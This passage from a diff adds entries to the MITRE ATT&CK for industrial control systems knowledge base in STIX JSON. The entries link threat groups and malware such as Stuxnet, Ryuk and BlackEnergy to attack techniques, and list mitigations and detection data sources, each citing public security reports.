"detects", + "source_ref": "x-mitre-data-component--235b7491-2d2b-4617-9a52-3c0783680f71", + "target_ref": "attack-pattern--c267bbee-bb59-47fe-85e0-3ed210337c21", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--cb1037c1-4b83-4a79-ba12-00558bb6b42b", + "type": "relationship", + "created": "2021-10-04T20:52:20.304Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "ESET Lazarus KillDisk April 2018", + "description": "Kálnai, P., Cherepanov A. (2018, April 03). Lazarus KillDisks Central American casino. Retrieved May 17, 2018.", + "url": "https://www.welivesecurity.com/2018/04/03/lazarus-killdisk-central-american-casino/" + } + ], + "modified": "2021-10-04T20:54:09.057Z", + "description": "(Citation: ESET Lazarus KillDisk April 2018)", + "relationship_type": "uses", + "source_ref": "intrusion-set--00f67a77-86a4-4adf-be26-1a54fc713340", + "target_ref": "malware--e221eb77-1502-4129-af1d-fe1ad55e7ec6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--83e5ebce-8d5d-43ca-a47f-ecb50ae8993a", + "created": "2022-05-11T16:22:58.807Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:32:52.932Z", + "description": "Monitor for newly constructed drive letters or mount points to removable media.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3d6e6b3b-4aa8-40e1-8c47-91db0f313d9f", + "target_ref": "attack-pattern--c267bbee-bb59-47fe-85e0-3ed210337c21", + 
"x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--b69f31c3-6c12-4b81-8e74-9c58ea635fa4", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.232Z", + "relationship_type": "mitigates", + "description": "Ensure that applications and devices do not store sensitive data or credentials insecurely (e.g., plaintext credentials in code, published credentials in repositories, or credentials in public cloud storage). (Citation: CISA June 2013)\n", + "source_ref": "course-of-action--8a3aadd0-b5f4-433a-800e-4893e4196bb7", + "target_ref": "attack-pattern--cd2c76a4-5e23-4ca5-9c40-d5e0604f7101", + "external_references": [ + { + "source_name": "CISA June 2013", + "description": "CISA 2013, June Risks of Default Passwords on the Internet Retrieved. 2020/09/25 ", + "url": "https://us-cert.cisa.gov/ncas/alerts/TA13-175A" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--6895e54e-3968-41a9-9013-a082cd46fa44", + "created": "2020-05-14T14:40:26.221Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Red Canary Hospital Thwarted Ryuk October 2020", + "url": "https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/", + "description": "Brian Donohue, Katie Nickels, Paul Michaud, Adina Bodkins, Taylor Chapman, Tony Lambert, Jeff Felling, Kyle Rainey, Mike Haag, Matt Graeber, Aaron Didier.. (2020, October 29). 
A Bazar start: How one hospital thwarted a Ryuk ransomware outbreak. Retrieved October 30, 2020." + }, + { + "source_name": "DHS/CISA Ransomware Targeting Healthcare October 2020", + "url": "https://us-cert.cisa.gov/ncas/alerts/aa20-302a", + "description": "DHS/CISA. (2020, October 28). Ransomware Activity Targeting the Healthcare and Public Health Sector. Retrieved October 28, 2020." + }, + { + "source_name": "CrowdStrike Ryuk January 2019", + "url": "https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/", + "description": "Hanel, A. (2019, January 10). Big Game Hunting with Ryuk: Another Lucrative Targeted Ransomware. Retrieved May 12, 2020." + }, + { + "source_name": "FireEye KEGTAP SINGLEMALT October 2020", + "url": "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html", + "description": "Kimberly Goody, Jeremy Kennelly, Joshua Shilko, Steve Elovitz, Douglas Bienstock. (2020, October 28). Unhappy Hour Special: KEGTAP and SINGLEMALT With a Ransomware Chaser. Retrieved October 28, 2020." + }, + { + "source_name": "CrowdStrike Wizard Spider October 2020", + "url": "https://www.crowdstrike.com/blog/wizard-spider-adversary-update/", + "description": "Podlosky, A., Hanel, A. et al. (2020, October 16). WIZARD SPIDER Update: Resilient, Reactive and Resolute. Retrieved June 15, 2021." + }, + { + "source_name": "Sophos New Ryuk Attack October 2020", + "url": "https://news.sophos.com/en-us/2020/10/14/inside-a-new-ryuk-ransomware-attack/", + "description": "Sean Gallagher, Peter Mackenzie, Elida Leite, Syed Shahram, Bill Kearney, Anand Aijan, Sivagnanam Gn, Suraj Mundalik. (2020, October 14). They’re back: inside a new Ryuk ransomware attack. Retrieved October 14, 2020." + }, + { + "source_name": "DFIR Ryuk 2 Hour Speed Run November 2020", + "url": "https://thedfirreport.com/2020/11/05/ryuk-speed-run-2-hours-to-ransom/", + "description": "The DFIR Report. (2020, November 5). 
Ryuk Speed Run, 2 Hours to Ransom. Retrieved November 6, 2020." + }, + { + "source_name": "DFIR Ryuk in 5 Hours October 2020", + "url": "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/", + "description": "The DFIR Report. (2020, October 18). Ryuk in 5 Hours. Retrieved October 19, 2020." + }, + { + "source_name": "DFIR Ryuk's Return October 2020", + "url": "https://thedfirreport.com/2020/10/08/ryuks-return/", + "description": "The DFIR Report. (2020, October 8). Ryuk’s Return. Retrieved October 9, 2020." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "(Citation: CrowdStrike Ryuk January 2019)(Citation: Red Canary Hospital Thwarted Ryuk October 2020)(Citation: DHS/CISA Ransomware Targeting Healthcare October 2020)(Citation: FireEye KEGTAP SINGLEMALT October 2020)(Citation: DFIR Ryuk's Return October 2020)(Citation: DFIR Ryuk 2 Hour Speed Run November 2020)(Citation: DFIR Ryuk in 5 Hours October 2020)(Citation: Sophos New Ryuk Attack October 2020)(Citation: CrowdStrike Wizard Spider October 2020)", + "modified": "2022-05-20T17:07:10.940Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7", + "target_ref": "malware--a020a61c-423f-4195-8c46-ba1d21abba37", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--41ff63a3-ddb9-47fb-8d92-bed74ed0d41d", + "created": "2021-04-11T14:06:54.109Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems March 2016", + "description": "Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems 2016, March 18 Analysis of the Cyber Attack on the Ukranian Power Grid: 
Defense Use Case Retrieved. 2018/03/27 ", + "url": "https://assets.contentstack.io/v3/assets/blt36c2e63521272fdc/blt6a77276749b76a40/607f235992f0063e5c070fff/E-ISAC_SANS_Ukraine_DUC_5%5b73%5d.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T16:55:23.567Z", + "description": "In the Ukraine 2015 Incident, [Sandworm Team](https://attack.mitre.org/groups/G0034) blocked reporting messages by using malicious firmware to render communication devices inoperable. (Citation: Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems March 2016)", + "relationship_type": "uses", + "source_ref": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192", + "target_ref": "attack-pattern--3f1f4ccb-9be2-4ff8-8f69-dd972221169b", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--a75ddacf-e87e-4a99-83f2-618486473163", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.217Z", + "relationship_type": "mitigates", + "description": "Patch the BIOS and EFI as necessary.\n", + "source_ref": "course-of-action--97f33c84-8508-45b9-8a1d-cac921828c9e", + "target_ref": "attack-pattern--b9160e77-ea9e-4ba9-b1c8-53a3c466b13d", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--874752f4-59a2-46e9-ae28-befe0142b223", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + 
"source_name": "Nicolas Falliere, Liam O Murchu, Eric Chien February 2011", + "description": "Nicolas Falliere, Liam O Murchu, Eric Chien 2011, February W32.Stuxnet Dossier (Version 1.4) Retrieved. 2017/09/22 ", + "url": "https://www.wired.com/images_blogs/threatlevel/2011/02/Symantec-Stuxnet-Update-Feb-2011.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-30T14:37:52.169Z", + "description": "[Stuxnet](https://attack.mitre.org/software/S0603) uses a hardcoded password in the WinCC software's database server as one of the mechanisms used to propagate to nearby systems. (Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)", + "relationship_type": "uses", + "source_ref": "malware--088f1d6e-0783-47c6-9923-9c79b2af43d4", + "target_ref": "attack-pattern--c9a8d958-fcdb-40d2-af4c-461c8031651a", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--3a7d1db3-9383-4171-8938-382e9b0375c6", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Booz Allen Hamilton", + "description": "Booz Allen Hamilton When The Lights Went Out Retrieved. 2019/10/22 ", + "url": "https://www.boozallen.com/content/dam/boozallen/documents/2016/09/ukraine-report-when-the-lights-went-out.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T17:36:37.304Z", + "description": "[BlackEnergy](https://attack.mitre.org/software/S0089) uses HTTP POST request to contact external command and control servers. 
(Citation: Booz Allen Hamilton)\n", + "relationship_type": "uses", + "source_ref": "malware--54cc1d4f-5c53-4f0e-9ef5-11b4998e82e4", + "target_ref": "attack-pattern--e076cca8-2f08-45c9-aff7-ea5ac798b387", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--172e0537-7a9c-4610-9b07-32a841f0bd8d", + "created": "2023-03-30T18:57:58.377Z", + "revoked": false, + "external_references": [ + { + "source_name": "Symantec", + "description": "Symantec W32.Duqu The precursor to the next Stuxnet Retrieved. 2019/11/03 ", + "url": "https://docs.broadcom.com/doc/w32-duqu-11-en" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-30T18:57:58.377Z", + "description": "[Duqu](https://attack.mitre.org/software/S0038) downloads additional modules for the collection of data from local systems. The modules are named: infostealer 1, infostealer 2 and reconnaissance. (Citation: Symantec)", + "relationship_type": "uses", + "source_ref": "malware--68dca94f-c11d-421e-9287-7c501108e18c", + "target_ref": "attack-pattern--fa3aa267-da22-4bdd-961f-03223322a8d5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--a846dbe5-9ef3-4fb6-93d5-f764671a75c8", + "created": "2021-04-11T14:06:54.109Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "ICS CERT September 2018", + "description": "ICS CERT 2018, September 06 Advantech/Broadwin WebAccess RPC Vulnerability (Update B) Retrieved. 
2019/12/05 ", + "url": "https://www.us-cert.gov/ics/advisories/ICSA-11-094-02B" + }, + { + "source_name": "ICS-CERT December 2014", + "description": "ICS-CERT 2014, December 10 ICS Alert (ICS-ALERT-14-281-01E) Ongoing Sophisticated Malware Campaign Compromising ICS (Update E) Retrieved. 2019/10/11 ", + "url": "https://www.us-cert.gov/ics/alerts/ICS-ALERT-14-281-01B" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T16:59:07.486Z", + "description": "[Sandworm Team](https://attack.mitre.org/groups/G0034) actors exploited vulnerabilities in GE's Cimplicity HMI and Advantech/Broadwin WebAccess HMI software which had been directly exposed to the internet. (Citation: ICS-CERT December 2014) (Citation: ICS CERT September 2018)", + "relationship_type": "uses", + "source_ref": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192", + "target_ref": "attack-pattern--32632a95-6856-47b9-9ab7-fea5cd7dce00", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--eac550b4-3bd2-4309-8b37-b797dd0bd8a7", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.101Z", + "relationship_type": "mitigates", + "description": "Segment operational network and systems to restrict access to critical system functions to predetermined management systems. 
(Citation: Department of Homeland Security September 2016)\n", + "source_ref": "course-of-action--1e7ccfc0-94c8-496e-8d27-032120892291", + "target_ref": "attack-pattern--2aa406ed-81c3-4c1d-ba83-cfbee5a2847a", + "external_references": [ + { + "source_name": "Department of Homeland Security September 2016", + "description": "Department of Homeland Security 2016, September Retrieved. 2020/09/25 ", + "url": "https://us-cert.cisa.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--6bf14e79-3287-4b9e-b222-9d527530df1e", + "created": "2022-05-11T16:22:58.807Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:57:08.560Z", + "description": "Monitor and analyze traffic flows that do not follow the expected protocol standards and traffic flows (e.g., extraneous packets that do not belong to established flows , or gratuitous or anomalous traffic patterns). 
Consider correlation with process monitoring and command line to detect anomalous processes execution and command line arguments associated to traffic patterns (e.g., monitor anomalies in use of files that do not normally initiate connections for respective protocol(s)).", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a", + "target_ref": "attack-pattern--e076cca8-2f08-45c9-aff7-ea5ac798b387", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--e257913e-40ba-4a05-ba97-0c3175c966b5", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Nicolas Falliere, Liam O Murchu, Eric Chien February 2011", + "description": "Nicolas Falliere, Liam O Murchu, Eric Chien 2011, February W32.Stuxnet Dossier (Version 1.4) Retrieved. 2017/09/22 ", + "url": "https://www.wired.com/images_blogs/threatlevel/2011/02/Symantec-Stuxnet-Update-Feb-2011.pdf" + }, + { + "source_name": "Langer Stuxnet", + "description": "Ralph Langner. (2013, November). To Kill a Centrifuge: A Technical Analysis of What Stuxnet's Creators Tried to Achieve. Retrieved December 7, 2020.", + "url": "https://www.langner.com/wp-content/uploads/2017/03/to-kill-a-centrifuge.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-17T16:01:04.366Z", + "description": "[Stuxnet](https://attack.mitre.org/software/S0603) manipulates the view of operators replaying process input and manipulating the I/O image to evade detection and inhibit protection functions. 
(Citation: Langer Stuxnet) (Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)", + "relationship_type": "uses", + "source_ref": "malware--088f1d6e-0783-47c6-9923-9c79b2af43d4", + "target_ref": "attack-pattern--4c2e1408-9d68-4187-8e6b-a77bc52700ec", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--04fa6b94-d633-40ff-9ab2-88f58c07c3e1", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.218Z", + "relationship_type": "mitigates", + "description": "Perform integrity checks of firmware before uploading it on a device. Utilize cryptographic hashes to verify the firmware has not been tampered with by comparing it to a trusted hash of the firmware. This could be from trusted data sources (e.g., vendor site) or through a third-party verification service.\n", + "source_ref": "course-of-action--bcf91ebc-f316-4e19-b2f6-444e9940c697", + "target_ref": "attack-pattern--b9160e77-ea9e-4ba9-b1c8-53a3c466b13d", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--652a68a2-a26b-4e8c-86dd-fd83187ed043", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.198Z", + "relationship_type": "mitigates", + "description": "Use host-based allowlists to prevent devices from accepting connections from unauthorized systems. 
For example, allowlists can be used to ensure devices can only connect with master stations or known management/engineering workstations. (Citation: Department of Homeland Security September 2016)\n", + "source_ref": "course-of-action--aadac250-bcdc-44e3-a4ae-f52bd0a7a16a", + "target_ref": "attack-pattern--b14395bd-5419-4ef4-9bd8-696936f509bb", + "external_references": [ + { + "source_name": "Department of Homeland Security September 2016", + "description": "Department of Homeland Security 2016, September Retrieved. 2020/09/25 ", + "url": "https://us-cert.cisa.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--afb0b60e-e604-4b96-abb9-57fdce4e5108", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.133Z", + "relationship_type": "mitigates", + "description": "Hot-standbys in diverse locations can ensure continued operations if the primarily system is compromised or unavailable. At the network layer, protocols such as the Parallel Redundancy Protocol can be used to simultaneously use redundant and diverse communication over a local network. (Citation: M. Rentschler and H. Heine)\n", + "source_ref": "course-of-action--f0f5c87a-a58d-440a-b3b5-ca679d98c6dd", + "target_ref": "attack-pattern--b5b9bacb-97f2-4249-b804-47fd44de1f95", + "external_references": [ + { + "source_name": "M. Rentschler and H. Heine", + "description": "M. Rentschler and H. Heine The Parallel Redundancy Protocol for industrial IP networks Retrieved. 
2020/09/25 ", + "url": "https://ieeexplore.ieee.org/document/6505877" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--9a44b2a8-9f4c-43df-9174-1cba6e165886", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.075Z", + "relationship_type": "mitigates", + "description": "Allow/denylists can be used to block access when excessive I/O connections are detected from a system or device during a specified time period.\n", + "source_ref": "course-of-action--11f242bc-3121-438c-84b2-5cbd46a4bb17", + "target_ref": "attack-pattern--8e7089d3-fba2-44f8-94a8-9a79c53920c4", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--72bfda0b-31e9-4958-8d40-6efe816d9989", + "created": "2022-09-27T15:32:03.332Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:33:47.681Z", + "description": "Devices that provide user access to the underlying operating system may allow the installation of custom software to monitor OS API execution. Monitoring API calls may generate a significant amount of data and may not be useful for defense unless collected under specific circumstances, since benign use of API functions are common and may be difficult to distinguish from malicious behavior. 
Correlation of other events with behavior surrounding API function calls using API monitoring will provide additional context to an event that may assist in determining if it is due to malicious behavior.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e", + "target_ref": "attack-pattern--5a2610f6-9fff-41e1-bc27-575ca20383d4", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_domains": [ + "ics-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2022-05-11T16:22:58.802Z", + "created": "2022-05-11T16:22:58.802Z", + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--4c12c1c8-bcef-4daf-8e5b-fca235f71d9e", + "name": "Process/Event Alarm", + "description": "This includes a list of any process alarms or alerts produced to indicate unusual or concerning activity within the operational process (e.g., increased temperature/pressure)", + "x_mitre_version": "1.0", + "x_mitre_data_source_ref": "x-mitre-data-source--1b8c9f31-ad35-4850-bf8c-80c565ad3552", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2022-10-07T16:15:56.932Z", + "name": "Process Creation", + "description": "The initial construction of an executable managed by the OS, that may involve one or more tasks or threads. (e.g. 
Win EID 4688, Sysmon EID 1, cmd.exe > net use, etc.)", + "x_mitre_data_source_ref": "x-mitre-data-source--e8b8ede7-337b-4c0c-8c32-5c7872c1ee22", + "x_mitre_deprecated": false, + "x_mitre_version": "1.1", + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--39b9db72-8b48-4595-a18d-db5bbba3091b", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.274Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.274Z", + "name": "Logon Session Metadata", + "description": "Contextual data about a logon session, such as username, logon type, access tokens (security context, user SIDs, logon identifiers, and logon SID), and any activity associated within it", + "x_mitre_data_source_ref": "x-mitre-data-source--4358c631-e253-4557-86df-f687d0ef9891", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "aliases": [ + "Dragonfly 2.0", + "IRON LIBERTY", + "DYMALLOY", + "Berserk Bear" + ], + "x_mitre_domains": [ + "ics-attack", + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "intrusion-set", + "id": "intrusion-set--76d59913-1d24-4992-a8ac-05a3eb093f71", + "created": "2018-10-17T00:14:20.652Z", + "x_mitre_version": "2.1", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": 
"G0074", + "url": "https://attack.mitre.org/groups/G0074" + }, + { + "source_name": "DYMALLOY", + "description": "(Citation: Dragos DYMALLOY )" + }, + { + "source_name": "Berserk Bear", + "description": "(Citation: Fortune Dragonfly 2.0 Sept 2017)" + }, + { + "source_name": "IRON LIBERTY", + "description": "(Citation: Secureworks MCMD July 2019)(Citation: Secureworks IRON LIBERTY)" + }, + { + "source_name": "Dragonfly 2.0", + "description": "(Citation: US-CERT TA18-074A) (Citation: Symantec Dragonfly Sept 2017) (Citation: Fortune Dragonfly 2.0 Sept 2017)" + }, + { + "source_name": "Dragos DYMALLOY ", + "url": "https://www.dragos.com/threat/dymalloy/", + "description": "Dragos. (n.d.). DYMALLOY. Retrieved August 20, 2020." + }, + { + "source_name": "Fortune Dragonfly 2.0 Sept 2017", + "url": "http://fortune.com/2017/09/06/hack-energy-grid-symantec/", + "description": "Hackett, R. (2017, September 6). Hackers Have Penetrated Energy Grid, Symantec Warns. Retrieved June 6, 2018." + }, + { + "source_name": "Secureworks MCMD July 2019", + "url": "https://www.secureworks.com/research/mcmd-malware-analysis", + "description": "Secureworks. (2019, July 24). MCMD Malware Analysis. Retrieved August 13, 2020." + }, + { + "source_name": "Secureworks IRON LIBERTY", + "url": "https://www.secureworks.com/research/threat-profiles/iron-liberty", + "description": "Secureworks. (n.d.). IRON LIBERTY. Retrieved October 15, 2020." + }, + { + "source_name": "Symantec Dragonfly Sept 2017", + "url": "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group", + "description": "Symantec Security Response. (2017, September 6). Dragonfly: Western energy sector targeted by sophisticated attack group. Retrieved September 9, 2017." + }, + { + "source_name": "US-CERT TA18-074A", + "url": "https://www.us-cert.gov/ncas/alerts/TA18-074A", + "description": "US-CERT. (2018, March 16). 
